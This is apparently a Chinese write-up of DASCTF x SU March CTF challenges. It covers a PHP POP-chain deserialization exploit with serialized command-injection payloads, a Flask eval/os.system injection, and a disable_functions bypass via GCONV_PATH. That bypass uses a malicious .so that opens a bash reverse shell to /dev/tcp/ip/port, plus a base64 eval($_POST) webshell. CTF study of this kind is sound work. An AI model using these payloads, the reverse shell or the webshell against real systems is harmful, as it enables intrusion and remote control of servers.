DASCTF x SU 春季挑战赛
DASCTF x SU三月赛复现
- 0x01 MISC
- 月圆之夜
- 什么奇奇怪怪的东西
- 0x02 WEB
- ezpop
- calc
- upgdstore
0x01 MISC
月圆之夜
这个直接B站上就行,有专门的破视频
题目:
DASCTF{welcometothefullmoonnight}
什么奇奇怪怪的东西
打开发现有MRF文件,键盘鼠标记录器,使用Macro Recorder软件打开,flag压缩包是干扰文件,直接不理。
这个软件不会用…
套神给的密码
然后解压flag.zip即可,发现有一个挂载的文件,直接打开后 显示所有的隐藏文件
一个一个打开 然后进行拼接运行吧估计。
首先打开txt文件直接久就给出了代码;
继续查看flag2.pptx文件也是直接给出了代码;
看3.xlsx 使用文本打开发现是一个压缩包 修改后缀后解压打开在/xl/sharedStrings.xml中;
在第四个图片中打开后发现有一个虚假的flag,使用010打开该图片文件尾有而外的数据,是png文件的倒置。
f = open('ZmxhZzQK.png','rb').read()
f1 = open('flag.png','w')
flag = ''
for i in f:flag += str(hex(i)[2:].zfill(2))
flag = flag[::-1]
f1.write(flag)
在线运行:运行网站
0x02 WEB
ezpop
一道简单的POP链构造,直接看链子的结尾和链子的入口,根据魔法方法进行构造。
然后这里值得一提就是在get_flag()
函数中使用了#
进行注释,我们只需要使用换行即可绕过这里达到命令执行的效果。
<?phpclass crow
{public $v1;public $v2;function eval() {echo new $this->v1($this->v2);}public function __invoke()//4. new fin();调用call函数{$this->v1->world();}
}class fin
{public $f1;public function __destruct()//1.链子入口{echo $this->f1 . '114514';// = new what();类当字符串使用调用toString}public function run(){($this->f1)();}public function __call($a, $b){echo $this->f1->get_flag();//5.获取flag}}class what
{public $a;public function __toString(){$this->a->run();//2. = new mix();调用run方法return 'hello';}
}class mix
{public $m1;public function run(){($this->m1)();//3.把对象当作函数使用调用invoke函数}public function get_flag(){eval('#' . $this->m1);}}if (isset($_POST['cmd'])) {unserialize($_POST['cmd']);
} else {highlight_file(__FILE__);
}
EXP:
<?php
class crow
{public $v1;public $v2;public function __construct($v1){$this->v1 = $v1;}
}class fin
{public $f1;public function __construct($f1){$this->f1 = $f1;}
}class what
{public $a;public function __construct($a){$this->a = $a;}
}
class mix
{public $m1;public function __construct($m1){$this->m1 = $m1;}
}$Fin = new mix("%0a;system('tac f*');");
$Crow = new fin($Fin);
$Mix = new crow($Crow);
$What = new mix($Mix);
$Fin2 = new what($What);
$a = new fin($Fin2);echo serialize($a);
//O:3:"fin":1:{s:2:"f1";O:4:"what":1:{s:1:"a";O:3:"mix":1:{s:2:"m1";O:4:"crow":2:{s:2:"v1";O:3:"fin":1:{s:2:"f1";O:3:"mix":1:{s:2:"m1";s:17:"%0a;system('ls');";}}s:2:"v2";N;}}}}
实际出来的时候 %0a会被解析为\n少一个字符所以长度要减1
cmd=O:3:"fin":1:{s:2:"f1";O:4:"what":1:{s:1:"a";O:3:"mix":1:{s:2:"m1";O:4:"crow":2:{s:2:"v1";O:3:"fin":1:{s:2:"f1";O:3:"mix":1:{s:2:"m1";s:16:"%0a;system('ls');";}}s:2:"v2";N;}}}}//cat H*cmd=O:3:"fin":1:{s:2:"f1";O:4:"what":1:{s:1:"a";O:3:"mix":1:{s:2:"m1";O:4:"crow":2:{s:2:"v1";O:3:"fin":1:{s:2:"f1";O:3:"mix":1:{s:2:"m1";s:20:"%0a;system('cat H*');";}}s:2:"v2";N;}}}}
calc
题目源码:
#coding=utf-8
from flask import Flask,render_template,url_for,render_template_string,redirect,request,current_app,session,abort,send_from_directory
import random
from urllib import parse
import os
from werkzeug.utils import secure_filename
import timeapp=Flask(__name__)def waf(s):blacklist = ['import','(',')',' ','_','|',';','"','{','}','&','getattr','os','system','class','subclasses','mro','request','args','eval','if','subprocess','file','open','popen','builtins','compile','execfile','from_pyfile','config','local','self','item','getitem','getattribute','func_globals','__init__','join','__dict__']flag = Truefor no in blacklist:if no.lower() in s.lower():flag= Falseprint(no)breakreturn flag@app.route("/")
def index():"欢迎来到SUctf2022"return render_template("index.html")@app.route("/calc",methods=['GET'])
def calc():ip = request.remote_addrnum = request.values.get("num")log = "echo {0} {1} {2}> ./tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S",time.localtime()),ip,num)if waf(num):try:data = eval(num)os.system(log)except:passreturn str(data)else:return "waf!!"if __name__ == "__main__":app.run(host='0.0.0.0',port=5000)
分析:这里我们关注传入的num中有一个eval执行,开始考虑到使用这里的方法继续宁RCE但后来测试发现过滤的内容有点多,难以绕过。只能考虑使用os.system(log)来执行命令,那么这里要怎么做才能执行到命令呢?毕竟log
是一个文本文件。
想执行系统命令就必须要经过python的eval
执行,如果输入了别的字符就会导致这个函数报错。
这里考虑到使用Python中的注释符号#
,这个符号可以注释掉python之后的内容,进而使python命令执行不报错。那么我们接下来看看linux中会是什么效果。
使用通配符外带出数据。(flag 可以使用*f*、*l*、*a*、*g*、*1*进行匹配)
upgdstore
只给一个文件上传页面,直接上传php文件但是好像对eval关键字做出了过滤所以先传入一个phpinfo()看看。
disable_function中的内容很多。
但是这里被过滤的很多,又show_source
和file_get_contents
没有被过滤
这里尝试读取一下源码:
<?php
('sho'.'w_source')("/var/www/html/index.php");//这里拼接绕过是因为这个函数是被放了黑名单里了
?>或base64_decode("c2hvd19zb3VyY2U=")("/var/www/html/index.php");
<div class="light"><span class="glow">
<form enctype="multipart/form-data" method="post" onsubmit="return checkFile()">嘿伙计,传个火?!<input class="input_file" type="file" name="upload_file"/><input class="button" type="submit" name="submit" value="upload"/>
</form>
</span><span class="flare"></span><div>
<?php
function fun($var): bool{$blacklist = ["\$_", "eval","copy" ,"assert","usort","include", "require", "$", "^", "~", "-", "%", "*","file","fopen","fwriter","fput","copy","curl","fread","fget","function_exists","dl","putenv","system","exec","shell_exec","passthru","proc_open","proc_close", "proc_get_status","checkdnsrr","getmxrr","getservbyname","getservbyport", "syslog","popen","show_source","highlight_file","`","chmod"];foreach($blacklist as $blackword){if(strstr($var, $blackword)) return True;}return False;
}
error_reporting(0);
//设置上传目录
define("UPLOAD_PATH", "./uploads");
$msg = "Upload Success!";
if (isset($_POST['submit'])) {$temp_file = $_FILES['upload_file']['tmp_name'];
$file_name = $_FILES['upload_file']['name'];
$ext = pathinfo($file_name,PATHINFO_EXTENSION);
if(!preg_match("/php/i", strtolower($ext))){die("只要好看的php");
}$content = file_get_contents($temp_file);
if(fun($content)){die("诶,被我发现了吧");
}
$new_file_name = md5($file_name).".".$ext;$img_path = UPLOAD_PATH . '/' . $new_file_name;if (move_uploaded_file($temp_file, $img_path)){$is_upload = true;} else {$msg = 'Upload Failed!';die();}echo '<div style="color:#F00">'.$msg." Look here~ ".$img_path."</div>";
}
接下来的思路就是绕过disable_function进行,常见的思路就是编译产生一个.so进行绕过。
参考:使用GCONV_PATH与iconv进行bypass disable_functions
BYPASS过程:
在某一文件夹(一般是/tmp)中上传gconv-modules文件,文件中指定我们自定义的字符集文件的.so,然后我们再在.so文件中的gonv_init()函数中书写命令执行函数,之后上传php的shell,内容是使用php设定GCONV_PATH指向我们的gconv-modules文件,然后使用iconv函数使我们的恶意代码执行。
第一步先要我们上传gconv-modules
文件,该文件格式如下:
module 自定义字符集名字(大写)// INTERNAL …/…/…/…/…/…/…/…/tmp/自定义字符集名字(小写) 2
module INTERNAL 自定义字符集名字(大写)// …/…/…/…/…/…/…/…/tmp/自定义字符集名字(小写) 2
所以我们写成:
module MOHE// INTERNAL …/…/…/…/…/…/…/…/tmp/mohe 2
module INTERNAL MOHE// …/…/…/…/…/…/…/…/tmp/mohe 2
第二步上传.so文件,c语言源代码如下:
#include <stdio.h>
#include <stdlib.h>void gconv() {}void gconv_init() {system("希望执行的命令");
}
我们写成:
#include <stdio.h>
#include <stdlib.h>
void gconv() {}
void gconv_init() {system("bash -c 'exec bash -i >& /dev/tcp/ip/port 0>&1'");//首选反弹shell
}
编译语句(编译为so文件):
gcc 源代码文件名.c -o 自定义字符集名.so -shared -fPIC
前面我们自定义字符定义为mohe所以这里的编译语句为:
gcc mohe.c -o mohe.so -shared -fPIC
第三步上传shell.php
<?phpputenv("GCONV_PATH=/tmp/");iconv("自定义字符集名", "UTF-8", "whatever");
?>
这个shell.php上传之后就可以直接访问了,在这道题中我们再最后上传一个webshell,然后进行文件的包含也可以达到相同的目的。
<?php base64_decode("PD9ldmFsKCRfUE9TVFttb2hlXSk7Pz4=");?>
最后的payload:
mohe=putenv("GCONV_PATH=/tmp/");include('php://filter/read=convert.iconv.mohe.utf-8/resource=/tmp/mohe.so')
反弹出shell。
DASCTF x SU 春季挑战赛相关推荐
- 2022DASCTF X SU 三月春季挑战赛 checkin 各种脚本学习分析
只能溢出0x10个字节,刚好能够覆盖返回地址,所以得利用栈迁移来做 第一种:利用magic_gadget修改got表中setvbuf的值 在64位程序的_do_global_dtors_aux中有这么 ...
- 2022DASCTF X SU 三月春季挑战赛 web复现
目录 ezpop Calc: Upgdstore: ezpop <?phpclass crow {public $v1;public $v2;function eval() {echo new ...
- 西湖论剑2022部分misc
文章目录 签到题喵 take_the_zip_easy mp3 机你太美 签到题喵 把文件尾的16进制复制出来,再转换字符串 私信后台即可获得flag take_the_zip_easy 明文攻击 e ...
- [DASCTF-Sept-X] 双目失明,身残志坚
题目内涵 一开始不知道题目是啥意思,把压缩包下载解压得到两张图片,瞬间明白了,绷不住了- 这是大图,想必大家都知道东京奥运会体操裁判双目失明仍然坚守岗位的事吧(狗头保命) 分析 给了两张图,看来是双图 ...
- [DASCTF Apr.2023 X SU战队2023开局之战] crypto复现
感觉突然啥都不会了,后来拿到官方WP,也没整明白,这官方的WP没有代码只讲了些道理,复现一下也不容易. 1,easySign 这是个自制的签名题. from secret import r, t fr ...
- DASCTF X CBCTF 2022九月挑战赛 WriteUp
BBBB WRITEUP MISC easy_keyboard Sign_in ezflow Mask Reverse landing web dino3d Text Reverser PWN ez_ ...
- 2020 DASCTF四月春季战-misc
misc 0x01 签到题 5G都来了,6G还远吗?6G下还需要开会员才能高速下载吗?请提交 DASCTF{} 里的内容. 下载发现有将近1G.作为签到题应该不需要这样做. 按下F12,接收到payl ...
- DASCTF X GFCTF 2022十月挑战赛 学习记录
这个比赛一向是大佬们的施展空间,哈哈哈我们就是混混.. 这里有点难受web一个没搞出来,misc搞出来两个... 滴滴图 给了一个压缩包解出来有两个文件 zip有密码使用,ARCHPR放到后台先破解破 ...
- DASCTF X GFCTF 2022十月挑战赛-hade_waibo
这是一个非预期解,但是得到出题人的赞许,莫名开心,哈哈: cancan need处存在任意文件读取 <!DOCTYPE html> <html lang="en" ...
最新文章
- 智能车竞赛技术报告 | 双车接力组 - 大连海事大学 - 同舟拾贰队
- SharedPreferences记住用户密码 态判断应用是否首次启动等
- Boost:双图bimap用户定义的名称未加标签的版本的测试程序
- python2.7.10安装教程_Linux系统(CentOS)下python2.7.10安装
- 在循环体中如何实现叠放效果
- java roundingmode.UP,即使明确设置,DecimalFormat也使用不正确的RoundingMode
- 屏蔽系统的故障定位案例
- 数据库系统概念第七版(Database System concepts 7th)课后答案英文版答案
- Apple Pay编程指南(5) - 处理付款结果
- 一个草根前端人的焦虑
- 人过大佛寺,寺佛大过人
- 2019-11软考报名网站汇总,陆续更新
- 网络主流平台可以买到 龙芯3A5000 处理器的电脑了。
- VMware安装虚拟机出现Operating System not found 解决方案
- 一文教你掌握广义估计方程
- google news(news.google.com)重大改版
- 分享一款超40款多功能工具箱组合微信小程序源码_支持流量主,聚集市面上大部分功能的小程序,无需服务器和域名!源码拿去!
- 中国人误传了数千年的七句话
- 第三方推送不能参与业务
- 使用Windows自带chkdsk命令修复一些硬盘和U盘存储不了数据的问题